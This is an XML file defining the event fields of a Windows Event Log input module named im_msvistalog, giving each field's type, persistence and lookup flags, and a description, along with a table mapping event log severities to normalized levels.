Edit: im_msvistalog-fields.xml
<fields>
  <module>im_msvistalog</module>

  <field>
    <name>raw_event</name>
    <type>string</type>
    <persist>FALSE</persist>
    <description>
      <en>
        A string containing the EventTime, Hostname, Severity, EventID, and Message from the event.
      </en>
    </description>
  </field>

  <field>
    <name>Message</name>
    <type>string</type>
    <persist>FALSE</persist>
    <lookup>FALSE</lookup>
    <description>
      <en>
        The message from the event.
      </en>
    </description>
  </field>

  <field>
    <name>EventTime</name>
    <type>datetime</type>
    <persist>TRUE</persist>
    <description>
      <en>
        The EvtSystemTimeCreated field.
      </en>
    </description>
  </field>

  <field>
    <name>Hostname</name>
    <type>string</type>
    <persist>TRUE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The EvtSystemComputer field.
      </en>
    </description>
  </field>

  <field>
    <name>SourceName</name>
    <type>string</type>
    <persist>TRUE</persist>
    <description>
      <en>
        The event source which produced the event, from the EvtSystemProviderName field.
      </en>
    </description>
  </field>

  <field>
    <name>EventID</name>
    <type>integer</type>
    <persist>TRUE</persist>
    <description>
      <en>
        The event ID (specific to the event source) from the EvtSystemEventID field.
      </en>
    </description>
  </field>

  <field>
    <name>Task</name>
    <type>integer</type>
    <persist>FALSE</persist>
    <description>
      <en>
        The task number from the EvtSystemTask field.
      </en>
    </description>
  </field>

  <field>
    <name>Category</name>
    <type>string</type>
    <persist>TRUE</persist>
    <description>
      <en>
        The category name resolved from Task.
      </en>
    </description>
  </field>

  <field>
    <name>Keywords</name>
    <type>integer</type>
    <persist>FALSE</persist>
    <description>
      <en>
        The value of the Keywords field from EvtSystemKeywords.
      </en>
    </description>
  </field>

  <field>
    <name>Channel</name>
    <type>string</type>
    <persist>TRUE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The Channel of the event source (for example, `Security` or `Application`).
      </en>
    </description>
  </field>

  <field>
    <name>AccountName</name>
    <type>string</type>
    <persist>TRUE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The username associated with the event.
      </en>
    </description>
  </field>

  <field>
    <name>AccountType</name>
    <type>string</type>
    <persist>TRUE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The type of the account. Possible values are: `User`, `Group`, `Domain`,
        `Alias`, `Well Known Group`, `Deleted Account`, `Invalid`, `Unknown`,
        and `Computer`.
      </en>
    </description>
  </field>

  <field>
    <name>Domain</name>
    <type>string</type>
    <persist>TRUE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The domain name of the user.
      </en>
    </description>
  </field>

  <field>
    <name>UserID</name>
    <type>string</type>
    <persist>FALSE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The Security Identifier (SID) which resolves to
        &lt;&lt;im_msvistalog_field_AccountName,$AccountName&gt;&gt;, stored in EvtSystemUserID.
      </en>
    </description>
  </field>

  <field>
    <name>SeverityValue</name>
    <type>integer</type>
    <persist>TRUE</persist>
    <description>
      <en>
        The normalized severity number of the event, mapped as follows.

[cols="2", options="header,autowidth"]
|===
|Event Log Severity
|Normalized Severity

|0/Audit Success
|2/INFO

|0/Audit Failure
|4/ERROR

|1/Critical
|5/CRITICAL

|2/Error
|4/ERROR

|3/Warning
|3/WARNING

|4/Information
|2/INFO

|5/Verbose
|1/DEBUG
|===
      </en>
    </description>
  </field>

  <field>
    <name>Severity</name>
    <type>string</type>
    <persist>TRUE</persist>
    <description>
      <en>
        The normalized severity name of the event. See
        &lt;&lt;im_msvistalog_field_SeverityValue,$SeverityValue&gt;&gt;.
      </en>
    </description>
  </field>

  <field>
    <name>EventType</name>
    <type>string</type>
    <persist>TRUE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The type of the event, which is a string describing the severity.
        This is translated to its string representation from EvtSystemLevel.
        Possible values are: `CRITICAL`, `ERROR`, `AUDIT_FAILURE`,
        `AUDIT_SUCCESS`, `INFO`, `WARNING`, and `VERBOSE`.
      </en>
    </description>
  </field>

  <field>
    <name>ProviderGuid</name>
    <type>string</type>
    <persist>FALSE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The globally unique identifier of the event's provider as stored in
        EvtSystemProviderGuid. This corresponds to the name of the provider in the
        &lt;&lt;im_msvistalog_field_SourceName,$SourceName&gt;&gt; field.
      </en>
    </description>
  </field>

  <field>
    <name>Version</name>
    <type>integer</type>
    <persist>FALSE</persist>
    <description>
      <en>
        The Version number of the event as in EvtSystemVersion.
      </en>
    </description>
  </field>

  <field>
    <name>OpcodeValue</name>
    <type>integer</type>
    <persist>FALSE</persist>
    <description>
      <en>
        The Opcode number of the event as in EvtSystemOpcode.
      </en>
    </description>
  </field>

  <field>
    <name>Opcode</name>
    <type>string</type>
    <persist>TRUE</persist>
    <description>
      <en>
        The Opcode string resolved from OpcodeValue.
      </en>
    </description>
  </field>

  <field>
    <name>ActivityID</name>
    <type>string</type>
    <persist>FALSE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        A globally unique identifier for the current activity, as stored in EvtSystemActivityID.
      </en>
    </description>
  </field>

  <field>
    <name>RelatedActivityID</name>
    <type>string</type>
    <persist>FALSE</persist>
    <lookup>TRUE</lookup>
    <description>
      <en>
        The RelatedActivityID as stored in EvtSystemRelatedActivityID.
      </en>
    </description>
  </field>

  <field>
    <name>ProcessID</name>
    <type>integer</type>
    <persist>FALSE</persist>
    <description>
      <en>
        The process identifier of the event producer as in EvtSystemProcessID.
      </en>
    </description>
  </field>

  <field>
    <name>ThreadID</name>
    <type>integer</type>
    <persist>FALSE</persist>
    <description>
      <en>
        The thread identifier of the event producer as in EvtSystemThreadID.
      </en>
    </description>
  </field>

  <field>
    <name>RecordNumber</name>
    <type>integer</type>
    <persist>FALSE</persist>
    <description>
      <en>
        The number of the event record.
      </en>
    </description>
  </field>
</fields>